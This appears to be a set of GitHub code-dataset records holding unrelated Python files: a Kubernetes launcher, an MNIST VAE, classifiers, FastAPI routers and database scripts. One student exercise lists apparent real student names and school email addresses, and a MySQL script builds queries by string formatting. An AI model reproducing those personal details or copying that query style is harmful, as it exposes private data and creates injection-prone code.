LocalPortOccupiedError as exe:\n err_message = Texts.PROXY_CREATED_EXTENDED_ERROR_MSG.format(app_name=k8s_app_name, reason=exe.message)\n raise LaunchError(err_message)\n except K8sProxyOpenError:\n error_msg = Texts.PROXY_CREATED_ERROR_MSG.format(app_name=k8s_app_name)\n logger.exception(error_msg)\n raise LaunchError(error_msg)\n except LaunchError as e:\n raise e\n except Exception:\n err_message = Texts.WEB_APP_LAUCH_FAIL_MSG\n logger.exception(err_message)\n raise LaunchError(err_message)\n","repo_name":"IntelAI/nauta","sub_path":"applications/cli/util/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":393,"dataset":"github-code","pt":"67"} +{"seq_id":"1671164117","text":"from PIL import Image\nfrom os import walk\n\nsourcePath = \"C:/Users/joshu/Pictures/rpg/raw/\"\ndestinationPath = \"C:/Users/joshu/Pictures/rpg/stitched/\"\nimageSize = 3200\nmatrixSize = 4\ncanvasSize = imageSize * matrixSize\n\ndef main():\n canvas = Image.new(\"RGBA\", (canvasSize, canvasSize))\n fileNames = []\n # Load names of images\n for (_, __, filenames) in walk(sourcePath):\n fileNames.extend(filenames)\n break\n # Put everything into place\n for index in range(0, len(fileNames)):\n # Load image\n image = Image.open(sourcePath + fileNames[index])\n # Get it's position in the end result\n position = getPosition(fileNames[index])\n # Paste it into position\n canvas.paste(image, (position[1], position[0]))\n canvas.save(destinationPath + 'output-restitched.png')\n print('saved output')\n\ndef getPosition(name):\n # name is in the format of something_01_02.bmp\n # separate to something_01_02\n splitName = name.split(\".\")[0]\n # separate to [something, 01, 02]\n yposition = splitName.split(\"_\")[1]\n # separate 01 to just 1\n if yposition[0] == '0':\n yposition = yposition[1]\n xposition = splitName.split(\"_\")[2]\n # separate 02 to just 2\n if xposition[0] == '0':\n xposition = xposition[1]\n # convert to coordinates\n ycoordinate = (int(yposition) - 1) * imageSize\n xcoordinate = (int(xposition) - 1) * imageSize\n return [xcoordinate, ycoordinate]\n\n\n# Begin the program\nmain()","repo_name":"j-c-levin/roleplaying_city_map_stitcher","sub_path":"stich.py","file_name":"stich.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22043647850","text":"import collections\nimport itertools\nimport math\nimport re\n\ninp = open(re.search(r\"day\\d\\d\", __file__)[0] + 'input.txt').read().strip()\nVAL = {\n '0': 0,\n '1': 1,\n '2': 2,\n '-': -1,\n '=': -2,\n}\n\ntotal = 0\nfor line in inp.splitlines():\n p = 1\n num = 0\n for c in reversed(line):\n num += VAL[c] * p\n p *= 5\n total += num\n\nprint(total)\n\nREV = {\n 0: '0',\n 1: '1',\n 2: '2',\n 3: '1=',\n 4: '1-',\n -1: '-',\n -2: '=',\n}\nnums = []\npad = 0\nwhile total:\n n = REV[total % 5]\n nums.append(n + '0' * pad)\n pad += 1\n total = total // 5\n\ndef add(s1, s2):\n while len(s1) < len(s2):\n s1 = '0' + s1\n while len(s2) < len(s1):\n s2 = '0' + s2\n ans = ''\n for a, b in zip(s1, s2):\n ans += REV[VAL[a] + VAL[b]]\n return ans\n\nsnafu = '0'\nfor n in nums:\n snafu = add(snafu, n)\n\nprint(snafu)\n","repo_name":"idealisms/adventofcode","sub_path":"2022/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36458548227","text":"InfoDb = []\n\nInfoDb.append({ \n \"FirstName\": \"Evan\", \n \"LastName\": \"Sanchez\", \n \"DOB\": \"September 28\", \n \"Residence\": \"San Diego\", \n \"Email\": \"evans54795@stu.powayusd.com\", \n \"Owns_Cars\":[\"2018 Volt\"] \n }) \n\nInfoDb.append({ \n \"FirstName\": \"Hassan\", \n \"LastName\": \"Allam\", \n \"DOB\": \"May 5\", \n \"Residence\": \"San Diego\", \n \"Email\": \"hassana07646@stu.powayusd.com\", \n \"Owns_Cars\":[\"2011 Sonata\"] \n }) \n\ndef print_data(n):\n print(InfoDb[n][\"FirstName\"], InfoDb[n][\"LastName\"]) \n \n print(\"\\t\", \"Cars: \", end=\"\") \n \n print(\", \".join(InfoDb[n][\"Owns_Cars\"])) \n \n print()\n\n# Hack 2: InfoDB loops. Print values from the lists using three different ways: for, while, recursion\n\nfor i in InfoDb:\n print(i)\n## hack 2a: def for_loop()\n## hack 2b: def while_loop(0)\n## hack 2c : def recursive_loop(0)\n\ndef tester():\n print(\"For loop\")\n for_loop()\n print(\"While loop\")\n while_loop(0) \n print(\"Recursive loop\")\n recursive_loop(0) ","repo_name":"deimie/CSP-individual","sub_path":"week1/infoDb.py","file_name":"infoDb.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19923734172","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 9 14:57:18 2019\n\n@author: Seko\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 9 13:53:06 2019\n\n@author: Erdo\n\"\"\"\n\n#%%\n\"\"\" MESELA BİR MODELİ EĞİTMEMİZ 1 HAFTA SÜRDÜ\n TEKRAR AÇTIĞIMDA YENİDEN Mİ EĞİTECEĞİZ?\n HAYIR TABİ Kİ PICKLE LIBRARY KULLANCAĞIZ:\n\"\"\"\n\"\"\"\nBir önceki örnekteki XGBoost classifier'ını kaydetmeyi ve çağırmayı görelim:\n\"\"\"\n\n#%%\n#%% \nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#%%\ndata = pd.read_csv('Churn_Modelling.csv')\ndata.head()\n\n#%%\n#veri on isleme\nX= data.iloc[:,3:13].values\nY = data.iloc[:,13].values\n\n#%%\n#encoder: Kategorik -> Numeric\nfrom sklearn.preprocessing import LabelEncoder\n\nle = LabelEncoder()\nX[:,1] = le.fit_transform(X[:,1])\n\nle2 = LabelEncoder()\nX[:,2] = le2.fit_transform(X[:,2])\n\nfrom sklearn.preprocessing import OneHotEncoder\nohe = OneHotEncoder(categorical_features=[1])\nX=ohe.fit_transform(X).toarray()\nX = X[:,1:]\n\n#%%\n#verilerin egitim ve test icin bolunmesi\nfrom sklearn.model_selection import train_test_split\nx_train, x_test,y_train,y_test = train_test_split(X,Y,test_size=0.33, random_state=0)\n\n#%% \n\"\"\" XGBoost \"\"\"\nfrom xgboost import XGBClassifier\nclassifier = XGBClassifier()\nclassifier.fit(x_train, y_train) # Sonuçta bu bir classifier. XGBoostta bir classification alg. demekki.\n\ny_pred = classifier.predict(x_test)\n\n#%%\n\"\"\" MODELİN KAYDEDİLMESİ \"\"\"\nimport pickle\n\ndosya = \"model.kayit\"\npickle.dump(classifier,open(dosya,'wb'))\n\n#%%\n\"\"\" MODELİN TEKRAR ÇAĞIRILMASI \"\"\"\nyuklenen = pickle.load(open(dosya,'rb'))\nprint(yuklenen.predict(x_test))\n\n\n\n\n\n","repo_name":"yildize/Basic-MachineLearning-Python","sub_path":"25. Modelin Kaydedilmesi ve Tekrar Çağırılması/ModelinKaydedilmesi.py","file_name":"ModelinKaydedilmesi.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74049282453","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(here, 'README.md')) as f:\n README = f.read()\nwith open(os.path.join(here, 'CHANGELOG.md')) as f:\n CHANGES = f.read()\n\ndev_requires = [\n 'pytest',\n 'pytest-cov',\n]\n\n\nsetup(\n author='Yaokai Yang',\n name='pyportscanner',\n version='0.3.2',\n description='Port Scanner for Python3+',\n long_description=README,\n long_description_content_type='text/markdown',\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Programming Language :: Python\",\n \"Topic :: System :: Networking :: Monitoring\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n url='https://github.com/YaokaiYang-assaultmaster/py3PortScanner',\n packages=find_packages(),\n package_data={'pyportscanner': ['etc/*.dat']},\n include_package_data=True,\n zip_safe=False,\n extras_require={\n 'dev': dev_requires,\n },\n)\n","repo_name":"YaokaiYang-assaultmaster/py3PortScanner","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"67"} +{"seq_id":"985652731","text":"from typing import cast\n\nfrom fastapi import APIRouter\nfrom pydantic import BaseModel\n\nfrom .views.api import View\nfrom .views.viewsets import AsyncGenericViewSet, GenericViewSet\n\n\ndef register_view(router: APIRouter, view: type[View], prefix: str = \"\"):\n for route_params in view.get_api_actions(prefix):\n router.add_api_route(**route_params)\n\n\nclass ViewRouter(APIRouter):\n register_view = register_view\n\n\nclass CrudRouter(ViewRouter):\n def __init__(\n self,\n name: str,\n repository,\n pk: type[BaseModel],\n serializer,\n create_serializer=None,\n update_serializer=None,\n is_async: bool = True,\n **extra\n ):\n super().__init__(**extra)\n bases = (AsyncGenericViewSet,) if is_async else (GenericViewSet,)\n crud_viewset = cast(\n type[AsyncGenericViewSet],\n type(\n \"GenericCrudViewset\",\n bases,\n {\n \"pk\": pk,\n \"repository\": repository,\n \"serializer\": serializer,\n \"api_component_name\": name,\n \"create_serializer\": create_serializer,\n \"update_serializer\": update_serializer,\n },\n ),\n )\n register_view(self, crud_viewset)\n","repo_name":"performancemedia/fastapi-views","sub_path":"fastapi_views/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"44258816552","text":"import json\nimport dml\nimport prov.model\nimport datetime\nimport uuid\n\n# Set up the database connection.\nclient = dml.pymongo.MongoClient()\nrepo = client.repo\nrepo.authenticate('loyuichi', 'loyuichi')\n\n# Retrieve some data sets (not using the API here for the sake of simplicity).\nstartTime = datetime.datetime.now()\n\nmeters_per_mile = 1609.34\n\nres = repo['loyuichi.food_establishments'].drop_indexes()\nprint(res)\nres = repo['loyuichi.food_establishments'].create_index([('location_point', dml.pymongo.GEOSPHERE)], unique=False)\nprint(res)\n\nres = repo['loyuichi.meters'].drop_indexes()\nprint(res)\nres = repo['loyuichi.meters'].create_index([('location', dml.pymongo.GEOSPHERE)], unique=False)\nprint(res)\n\nres = repo['loyuichi.tickets'].drop_indexes()\nprint(res)\nres = repo['loyuichi.tickets'].create_index([('location_point', dml.pymongo.GEOSPHERE)], unique=False)\nprint(res)\n\n# res = repo['loyuichi.towed'].drop_indexes()\n# print(res)\n# res = repo['loyuichi.towed'].create_index([('location_point', pymongo.GEOSPHERE)], unique=False)\n# print(res)\n\ndata = []\nrepo.dropPermanent('fe_radius')\nrepo.createPermanent('fe_radius')\nfor fe in repo['loyuichi.food_establishments'].find():\n\tcoordinates = fe['location']['coordinates']\n\tmeters_count = repo['loyuichi.meters'].count({ 'location': { '$nearSphere': { '$geometry': { 'type': \"Point\", 'coordinates': coordinates }, '$maxDistance': 0.4 * meters_per_mile } } })\n\ttickets_count = repo['loyuichi.tickets'].count({ 'location_point': { '$nearSphere': { '$geometry': { 'type': \"Point\", 'coordinates': coordinates }, '$maxDistance': 0.4 * meters_per_mile } } })\n\t# towed_count = repo['loyuichi.towed'].count({ 'location_point': { '$nearSphere': { '$geometry': { 'type': \"Point\", 'coordinates': coordinates }, '$maxDistance': 0.7 * meters_per_mile } } })\n\tscore = meters_count + (-0.3*tickets_count)\n\tdata += [{'_id': fe['_id'], 'name': fe['businessname'], 'location_point': fe['location_point'], 'meters': meters_count, 'tickets': tickets_count, 'score': score}]\nrepo['loyuichi.fe_radius'].insert_many(data)\n\n\n#Outputting the results to a JSON file formatted for heatmap.html\ndata = []\nfor fe in repo['loyuichi.fe_radius'].find({}, {'_id': 0}):\n\tprint(fe)\n\tdata += [fe]\n\nwith open('fe_radius.json', 'w') as outfile:\n\tout = \"var food_establishments = \"\n\tout += json.dumps(data)\n\toutfile.write(out)\n\ndata = []\nfor m in repo['loyuichi.meters'].find({}, {'_id': 0, 'location': 1}):\n\tdata += [m]\n\nwith open('meters.json', 'w') as outfile:\n\tout = \"var meters = \"\n\tout += json.dumps(data)\n\toutfile.write(out)\n\n\n\n","repo_name":"data-mechanics/course-2016-spr-proj","sub_path":"loyuichi/count_nearby.py","file_name":"count_nearby.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"16909115799","text":"\"\"\"Reach the databases from the app\n\nThe function will be called so the app can reach the data(the events) in the databases\n\"\"\"\n\n\nimport MySQLdb\nfrom my_credentials import MyCredentials\n\n\ndef get_db_info():\n \"\"\"\n Reaches the db tables. Iterates through the events of both today and future. For each event of each category,\n it finds the corresponding id venue and artist tables and appends these to one event info bundle (list).\n\n :return: one list containing two more lists, one for todays events, one for future events.\n :rtype: list\n \"\"\"\n\n db = MySQLdb.connect(MyCredentials.DB_URL,\n MyCredentials.USERNAME,\n MyCredentials.PASSWORD, 'findthebeat', charset='utf8', port=3306)\n\n cursor = db.cursor()\n\n events_today = []\n events_future = []\n events_past = []\n\n for date_status in ['today', 'future', 'past']:\n\n cursor.execute(f\"SELECT * FROM event WHERE event_date_status='{date_status}'\")\n\n for event_listing in list(cursor.fetchall()):\n\n event_info_bundle = list()\n event_info_bundle.append(list(event_listing)[4:])\n cursor.execute(\"SELECT artist_name, facebook_url FROM artist WHERE artist_id=%s\" % (event_listing[2]))\n event_info_bundle.append(list(cursor.fetchall()[0]))\n cursor.execute(\"\"\"\n SELECT venue_name, venue_url, venue_address FROM venue WHERE venue_id=%s\"\"\" % (event_listing[1]))\n event_info_bundle.append(list(cursor.fetchall()[0]))\n\n if date_status == 'today':\n events_today.append(event_info_bundle)\n\n elif date_status == 'future':\n events_future.append(event_info_bundle)\n\n elif date_status == 'past':\n events_past.append(event_info_bundle)\n\n db.close()\n\n return [events_today, events_future, events_past]\n","repo_name":"logiczsniper/Find-The-Beat","sub_path":"src/reach_db.py","file_name":"reach_db.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"1680390889","text":"from __future__ import print_function\nimport numpy as np\nfrom scipy.stats import norm\nimport torch\nimport torch.nn as nn\nfrom torch.nn import Parameter\nimport sys\nfrom torchvision import datasets, transforms\nimport os\nimport time\nfrom random import random\nsys.path.append('../')\nimport probtorch\nfrom probtorch.util import expand_inputs\nprint('probtorch:', probtorch.__version__,\n 'torch:', torch.__version__,\n 'cuda:', torch.cuda.is_available())\n\n# Model Paramters:\nNUM_PIXELS = 784\nNUM_HIDDEN1 = 400\nNUM_HIDDEN2 = 200\nNUM_STYLE = 10\nNUM_DIGITS = 10\n\n# Training Parameters:\nNUM_SAMPLES = 1\nNUM_BATCH = 128\nNUM_EPOCHS = 200\nLABEL_FRACTION = 0.1\nLEARNING_RATE = 1e-3\nEPS = 1e-9\nBIAS_TRAIN = (60000 - 1) / (NUM_BATCH - 1)\nBIAS_TEST = (10000 - 1) / (NUM_BATCH - 1)\nCUDA = torch.cuda.is_available()\n\n# LOSS parameters:\nALPHA = 0.1\nBETA = (4.0, 1.0, 1.0, 0.0, 1.0)\n\n# path parameters\nMODEL_NAME = 'mnist-semisupervised-inference-marginal-%02ddim' % NUM_STYLE\nDATA_PATH = 'data'\nIMAGES_PATH = 'images_semisupervised_inference_marginal'\nWEIGHTS_PATH = 'weights_semisupervised_inference_marginal'\nRESTORE = False\n\nclass Encoder(nn.Module):\n\n def __init__(self, num_pixels=NUM_PIXELS,\n num_hidden1=NUM_HIDDEN1,\n num_hidden2=NUM_HIDDEN2,\n num_style=NUM_STYLE,\n num_digits=NUM_DIGITS):\n\n super(self.__class__, self).__init__()\n self.enc_hidden = nn.Sequential(\n nn.Linear(num_pixels, num_hidden1),\n nn.ReLU())\n self.digit_log_weights = nn.Linear(num_hidden1, num_digits)\n self.digit_temp = 0.66\n self.style_mean = nn.Sequential(\n nn.Linear(num_hidden1 + num_digits, num_hidden2),\n nn.ReLU(),\n nn.Linear(num_hidden2, num_style))\n self.style_log_std = nn.Sequential(\n nn.Linear(num_hidden1 + num_digits, num_hidden2),\n nn.ReLU(),\n nn.Linear(num_hidden2, num_style))\n\n @expand_inputs\n def forward(self, images, labels=None, num_samples=NUM_SAMPLES):\n q = probtorch.Trace()\n hidden = self.enc_hidden(images)\n digits = q.concrete(logits=self.digit_log_weights(hidden),\n temperature=self.digit_temp,\n value=labels,\n name='y')\n hidden2 = torch.cat([digits, hidden] , -1)\n styles_mean = self.style_mean(hidden2)\n styles_std = self.style_log_std(hidden2).exp()\n q.normal(loc=styles_mean,\n scale=styles_std,\n name='z')\n return q\n\ndef binary_cross_entropy(x_mean, x, EPS=1e-9):\n return - (torch.log(x_mean + EPS) * x +\n torch.log(1 - x_mean + EPS) * (1 - x)).sum(-1)\n\nclass Decoder(nn.Module):\n def __init__(self, num_pixels=NUM_PIXELS,\n num_hidden1=NUM_HIDDEN1,\n num_hidden2=NUM_HIDDEN2,\n num_style=NUM_STYLE,\n num_digits=NUM_DIGITS):\n\n super(self.__class__, self).__init__()\n self.dec_hidden = nn.Sequential(\n nn.Linear(num_style + num_digits, num_hidden2),\n nn.ReLU(),\n nn.Linear(num_hidden2, num_hidden1),\n nn.ReLU())\n\n self.num_style = num_style\n self.num_digits = num_digits\n self.digit_temp = 0.66\n self.dec_images = nn.Sequential(\n nn.Linear(num_hidden1, num_pixels),\n nn.Sigmoid())\n\n def forward(self, images, q=None, num_samples=NUM_SAMPLES, batch_size=NUM_BATCH):\n p = probtorch.Trace()\n digit_log_weights = torch.zeros(num_samples, batch_size, self.num_digits)\n style_mean = torch.zeros(num_samples, batch_size, self.num_style)\n style_std = torch.ones(num_samples, batch_size, self.num_style)\n\n if CUDA:\n digit_log_weights = digit_log_weights.cuda()\n style_mean = style_mean.cuda()\n style_std = style_std.cuda()\n\n digits = digits = p.concrete(logits=digit_log_weights,\n temperature=self.digit_temp,\n value=q['y'],\n name='y')\n\n styles = p.normal(loc=style_mean,\n scale=style_std,\n value=q['z'],\n name='z')\n\n hiddens = self.dec_hidden(torch.cat([digits, styles], -1))\n images_mean = self.dec_images(hiddens)\n p.loss(binary_cross_entropy, images_mean, images, name='images')\n return p\n\ndef elbo(q, p, alpha=ALPHA, beta=BETA, bias=1.0):\n return probtorch.objectives.marginal.elbo(q, p, sample_dim=0, batch_dim=1,\n alpha=alpha, beta=beta, bias=bias)\n\nif not os.path.isdir(DATA_PATH):\n os.makedirs(DATA_PATH)\n\ntrain_data = torch.utils.data.DataLoader(\n datasets.MNIST(DATA_PATH, train=True, download=True,\n transform=transforms.ToTensor()),\n batch_size=NUM_BATCH, shuffle=True)\ntest_data = torch.utils.data.DataLoader(\n datasets.MNIST(DATA_PATH, train=False, download=True,\n transform=transforms.ToTensor()),\n batch_size=NUM_BATCH, shuffle=True)\n\nenc = Encoder()\ndec = Decoder()\nif CUDA:\n enc.cuda()\n dec.cuda()\noptimizer = torch.optim.Adam(list(enc.parameters())+list(dec.parameters()),\n lr=LEARNING_RATE)\n\ndef train(data, enc, dec, optimizer,\n label_mask={}, label_fraction=LABEL_FRACTION):\n epoch_elbo = 0.0\n enc.train()\n dec.train()\n N = 0\n for b, (images, labels) in enumerate(data):\n if images.size(0) == NUM_BATCH:\n N += NUM_BATCH\n images = images.view(-1, NUM_PIXELS)\n labels_onehot = torch.zeros(NUM_BATCH, NUM_DIGITS)\n labels_onehot.scatter_(1, labels.unsqueeze(1), 1)\n labels_onehot = torch.clamp(labels_onehot, EPS, 1-EPS)\n if CUDA:\n images = images.cuda()\n labels_onehot = labels_onehot.cuda()\n optimizer.zero_grad()\n if b not in label_mask:\n label_mask[b] = (random() < label_fraction)\n if label_mask[b]:\n q = enc(images, labels_onehot, num_samples=NUM_SAMPLES)\n else:\n q = enc(images, num_samples=NUM_SAMPLES)\n p = dec(images, q, num_samples=NUM_SAMPLES, batch_size=NUM_BATCH)\n loss = -elbo(q, p, bias=BIAS_TRAIN)\n loss.backward()\n optimizer.step()\n if CUDA:\n loss = loss.cpu()\n epoch_elbo -= loss.item()\n return epoch_elbo / N, label_mask\n\n\ndef test(data, enc, dec, infer=True):\n enc.eval()\n dec.eval()\n epoch_elbo = 0.0\n epoch_correct = 0\n N = 0\n for b, (images, labels) in enumerate(data):\n if images.size()[0] == NUM_BATCH:\n N += NUM_BATCH\n images = images.view(-1, NUM_PIXELS)\n if CUDA:\n images = images.cuda()\n q = enc(images, num_samples=NUM_SAMPLES)\n p = dec(images, q, num_samples=NUM_SAMPLES, batch_size=NUM_BATCH)\n batch_elbo = elbo(q, p, bias=BIAS_TEST)\n if CUDA:\n batch_elbo = batch_elbo.cpu()\n epoch_elbo += batch_elbo.data.numpy()\n\n log_p = p.log_joint(0, 1)\n log_q = q.log_joint(0, 1)\n log_w = log_p - log_q\n w = torch.nn.functional.softmax(log_w, 0)\n y_samples = q['y'].value\n y_expect = (w.unsqueeze(-1) * y_samples).sum(0)\n _ , y_pred = y_expect.data.max(-1)\n if CUDA:\n y_pred = y_pred.cpu()\n epoch_correct += (labels == y_pred).float().sum()\n return epoch_elbo / N, epoch_correct / N\n\nif not RESTORE:\n mask = {}\n for e in range(NUM_EPOCHS):\n train_start = time.time()\n train_elbo, mask = train(train_data, enc, dec,\n optimizer, mask, LABEL_FRACTION)\n train_end = time.time()\n test_start = time.time()\n test_elbo, test_accuracy = test(test_data, enc, dec)\n test_end = time.time()\n\n print('[Epoch %d] Train: ELBO %.4e (%ds) Test: ELBO %.4e, Accuracy %0.3f (%ds)' % (\n e, train_elbo, train_end - train_start,\n test_elbo, test_accuracy, test_end - test_start))\n f = open(\"ouput_semisupervised_iwae.txt\",\"a\")\n f.write('[Epoch %d] Train: ELBO %.4e (%ds) Test: ELBO %.4e, Accuracy %0.3f (%ds)\\n' % (\n e, train_elbo, train_end - train_start,\n test_elbo, test_accuracy, test_end - test_start))\n f.close()\n if not os.path.isdir(WEIGHTS_PATH):\n os.mkdir(WEIGHTS_PATH)\n torch.save(enc.state_dict(),\n '%s/%s-%s-%s-enc.rar' % (WEIGHTS_PATH, MODEL_NAME, probtorch.__version__, torch.__version__))\n torch.save(dec.state_dict(),\n '%s/%s-%s-%s-dec.rar' % (WEIGHTS_PATH, MODEL_NAME, probtorch.__version__, torch.__version__))\n","repo_name":"cs771mlproject/Learning-Disentangled-Representation","sub_path":"mnist-semisupervised-inference-marginal.py","file_name":"mnist-semisupervised-inference-marginal.py","file_ext":"py","file_size_in_byte":9362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"19010498069","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport scipy.io\nimport math\nimport geneNewData\n\ndef calculate_features(data):\n num_samples, height, width = data.shape\n features = np.zeros((num_samples, 2)) # Create an array to store the calculated features\n \n for i in range(num_samples):\n image = data[i]\n brightness_values = image.reshape(-1) # Flatten the 2D image array into a 1D array\n average_brightness = np.mean(brightness_values)\n std_dev_brightness = np.std(brightness_values)\n \n features[i, 0] = average_brightness\n features[i, 1] = std_dev_brightness\n \n return features\n\ndef calculate_parameters(data):\n feature1_mean = np.mean(data[:, 0])\n feature1_variance = np.var(data[:, 0])\n feature2_mean = np.mean(data[:, 1])\n feature2_variance = np.var(data[:, 1])\n \n return feature1_mean, feature1_variance, feature2_mean, feature2_variance\n\ndef calculate_naive_bayes_probability(feature, mean, variance):\n exponent = -((feature - mean) ** 2) / (2 * variance)\n probability = np.exp(exponent) / (np.sqrt(2 * np.pi * variance))\n return probability\n\ndef classify_data(data, params_digit0, params_digit1):\n predictions = []\n \n for i in range(data.shape[0]):\n feature1 = data[i, 0]\n feature2 = data[i, 1]\n \n prob_feature1_digit0 = calculate_naive_bayes_probability(feature1, params_digit0[0], params_digit0[1])\n prob_feature2_digit0 = calculate_naive_bayes_probability(feature2, params_digit0[2], params_digit0[3])\n prob_digit0 = prob_feature1_digit0 * prob_feature2_digit0\n \n prob_feature1_digit1 = calculate_naive_bayes_probability(feature1, params_digit1[0], params_digit1[1])\n prob_feature2_digit1 = calculate_naive_bayes_probability(feature2, params_digit1[2], params_digit1[3])\n prob_digit1 = prob_feature1_digit1 * prob_feature2_digit1\n \n if prob_digit0 > prob_digit1:\n predictions.append(0)\n else:\n predictions.append(1)\n \n return predictions\n\ndef calculate_accuracy(predictions, actual_labels):\n correct_predictions = np.sum(predictions == actual_labels)\n total_predictions = len(predictions)\n accuracy = correct_predictions / total_predictions * 100\n return accuracy\n\ndef check_within_range(value, target, tolerance):\n lower_bound = target - tolerance\n upper_bound = target + tolerance\n return lower_bound <= value <= upper_bound\n\ndef main():\n myID = '1284' # your ID here\n geneNewData.geneData(myID)\n Numpyfile0 = scipy.io.loadmat('digit0_stu_train'+myID)\n Numpyfile1 = scipy.io.loadmat('digit1_stu_train'+myID)\n Numpyfile2 = scipy.io.loadmat('digit0_testset')\n Numpyfile3 = scipy.io.loadmat('digit1_testset')\n\n train0 = Numpyfile0.get('target_img')\n train1 = Numpyfile1.get('target_img')\n test0 = Numpyfile2.get('target_img')\n test1 = Numpyfile3.get('target_img')\n \n # Task 1\n # Calculate features for digit \"0\" training set\n features_train0 = calculate_features(train0)\n # Calculate features for digit \"1\" training set\n features_train1 = calculate_features(train1)\n\n # Task 2\n # Calculate parameters for digit \"0\" based on the generated features\n feature0_params = calculate_parameters(features_train0)\n # Calculate parameters for digit \"1\" based on the generated features\n feature1_params = calculate_parameters(features_train1)\n # Unpack the calculated parameters\n mean_feature1_digit0, variance_feature1_digit0, mean_feature2_digit0, variance_feature2_digit0 = feature0_params\n mean_feature1_digit1, variance_feature1_digit1, mean_feature2_digit1, variance_feature2_digit1 = feature1_params\n print(\"mean_feature1_digit0\", mean_feature1_digit0)\n print(\"variance_feature1_digit0\", variance_feature1_digit0)\n print(\"mean_feature2_digit0\", mean_feature2_digit0)\n print(\"variance_feature2_digit0\", variance_feature2_digit0)\n print(\"mean_feature1_digit1\", mean_feature1_digit1)\n print(\"variance_feature1_digit1\", variance_feature1_digit1)\n print(\"mean_feature2_digit1\", mean_feature2_digit1)\n print(\"variance_feature2_digit1\", variance_feature2_digit1)\n\n # Task 3\n # Convert the original test data arrays to 2-D data points\n features_test0 = calculate_features(test0)\n features_test1 = calculate_features(test1)\n # Classify the test data points for digit \"0\" and \"1\" using the calculated parameters\n predictions_test0 = classify_data(features_test0, feature0_params, feature1_params)\n predictions_test1 = classify_data(features_test1, feature0_params, feature1_params)\n print(\"predictions_test0\", predictions_test0)\n print(\"predictions_test1\", predictions_test1)\n\n # Task 4\n actual_labels_test0 = np.zeros(len(test0)) # Actual labels for digit \"0\"\n actual_labels_test1 = np.ones(len(test1)) # Actual labels for digit \"1\"\n # Calculate the accuracy of predictions for digit \"0\" test data\n accuracy_test0 = calculate_accuracy(predictions_test0, actual_labels_test0)\n # Calculate the accuracy of predictions for digit \"1\" test data\n accuracy_test1 = calculate_accuracy(predictions_test1, actual_labels_test1)\n print(f\"Accuracy for digit 0 test data: {accuracy_test0:.2f}%\")\n print(f\"Accuracy for digit 1 test data: {accuracy_test1:.2f}%\")\n # Checking if the calculated parameters are within acceptable ranges\n params_within_range = all(\n check_within_range(param, target, tolerance)\n for param, target, tolerance in zip(\n feature0_params + feature1_params,\n [mean_feature1_digit0, variance_feature1_digit0, mean_feature2_digit0, variance_feature2_digit0,\n mean_feature1_digit1, variance_feature1_digit1, mean_feature2_digit1, variance_feature2_digit1],\n [0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2]\n )\n )\n # checking if accuracy of predictions are within acceptable ranges\n # Set the target accuracy values for digit 0 and digit 1 test data\n target_accuracy_test0 = accuracy_test0\n target_accuracy_test1 = accuracy_test1\n accuracy_within_range_test0 = check_within_range(accuracy_test0, target_accuracy_test0, 0.005)\n accuracy_within_range_test1 = check_within_range(accuracy_test1, target_accuracy_test1, 0.005)\n if params_within_range:\n print(\"Parameters are within acceptable ranges.\")\n else:\n print(\"Parameters are not within acceptable ranges.\")\n if accuracy_within_range_test0:\n print(f\"Accuracy for digit 0 test data is within acceptable range: {accuracy_test0:.2f}%\")\n else:\n print(f\"Accuracy for digit 0 test data is not within acceptable range: {accuracy_test0:.2f}%\")\n\n if accuracy_within_range_test1:\n print(f\"Accuracy for digit 1 test data is within acceptable range: {accuracy_test1:.2f}%\")\n else:\n print(f\"Accuracy for digit 1 test data is not within acceptable range: {accuracy_test1:.2f}%\")\n pass\nif __name__ == '__main__':\n main()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"mobigaurav/cse575-projects","sub_path":"Project1-density-estimation-classification/renamedNB.py","file_name":"renamedNB.py","file_ext":"py","file_size_in_byte":7048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14430450200","text":"import sys\nimport socket\nimport threading\nfrom M2Crypto import RSA\nfrom M2Crypto.BIO import BIOError, 